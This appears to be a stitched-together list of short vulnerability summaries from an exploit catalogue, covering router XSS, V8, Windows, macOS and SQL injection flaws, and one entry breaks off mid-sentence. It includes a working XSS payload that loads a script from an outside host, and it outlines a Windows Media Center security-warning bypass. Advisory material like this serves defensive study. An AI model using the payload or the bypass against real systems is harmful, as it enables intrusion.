This program overwrites the system's huge zero page.
This exploit allows for persistent XSS on intelbras routers with firmware WRN 250. The vulnerability can be exploited by injecting a malicious script through the URL http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm. The payload used in the exploit is </script><script src='//elb.me'>. This exploit requires the presence of a PHP script to retrieve the logs.
This exploit targets a vulnerability in the V8 JavaScript engine, specifically an out-of-bounds write bug. By manipulating certain arrays and memory layouts, the exploit is able to write to memory locations outside of the intended bounds, potentially leading to arbitrary code execution. The exploit takes advantage of a bug reported in the Chromium bug tracker (https://crbug.com/716044).
The MsMpEng service in Windows is remotely accessible without authentication, allowing attackers to exploit vulnerabilities in the service. This includes accessing mpengine by sending emails, visiting links, and other methods. The vulnerabilities in MsMpEng are severe due to the privilege, accessibility, and ubiquity of the service. The core component responsible for scanning and analysis, called mpengine, is a complex attack surface accessible to remote attackers. The NScript component in mpengine evaluates JavaScript code, making it highly privileged and unsandboxed.
The win32k!NtGdiGetDIBitsInternal system call in Windows is vulnerable to a double-fetch vulnerability. This can potentially lead to kernel pool memory disclosure or denial of service. The vulnerability occurs when accessing the BITMAPINFOHEADER structure multiple times, specifically its .biSize field. By manipulating the user-controlled 'bmi' buffer, an attacker can exploit this vulnerability to corrupt memory or cause a denial of service. However, the exploit is mostly harmless due to various checks in place that prevent major consequences.
An integer overflow error within the 'LoadUvsTable()' function of usp10.dll can be exploited to cause a heap-based buffer overflow.
Remote SQL injection in msg.php id, able to pull admin user/pass.
This vulnerability exists in the IOBluetoothHCIUserClient of the IOKit framework in macOS. When creating a new IOBluetoothHCIUserClient, if the userclient doesn't take a reference to the owningTask, an attacker can pass a task port for another task, kill that task, and get the user client to use the freed task struct. This can lead to a use-after-free vulnerability, allowing an attacker to manipulate IOMemoryDescriptors and potentially execute arbitrary code.
Microsoft Windows Media Center (all versions prior to May 11th, 2016) contains a remote code execution upon processing specially crafted .MCL files. The vulnerability exists because Windows Media Center does not correctly processes paths in the "Run" parameter of the "Application" tag, bypassing the usual security warning displayed upon trying to run programs residing on remote (WebDAV/SMB) shares. In order to bypass the Windows Media Center security warning an attacker only needs to write the prefix "file://" before the actual remote location. For example : file:///192.168.10.10shareapp.exe. However, Windows will still display an "Open File" security warning for files placed in remote locations (Internet Security Zone of IE), which can also be bypassed using a special "Control Panel Shortcut" that points to a remote DLL/CPL file. Upon pointing to a shortcut located in a remote share it is possible to run arbitrary code in the context of the currently logged on user. Note: On 64 bits Windows OSes, a 64-bits DLL should be provided, but 32-bits DLL files should work as well. A PoC MCL file is provided, which points to a default Windows share, to retrieve a special "Control Panel Shortcut", that runs a CPL file from the same location (127.0.0.1c$programdatacpl.lnk). Notice that although the address points to the "Localhost", Windows treats it the same way as any other IP based location, placing it in the context of the IE "Internet Security Zone" (default for non-local places). The PoC CPL file only runs "cmd.exe /c calc" for demonstration purposes. Another important note is that after this Micr
The RPCSS Activation Kernel RPC serverβs security callback can be bypassed resulting in EoP.
Services By CQR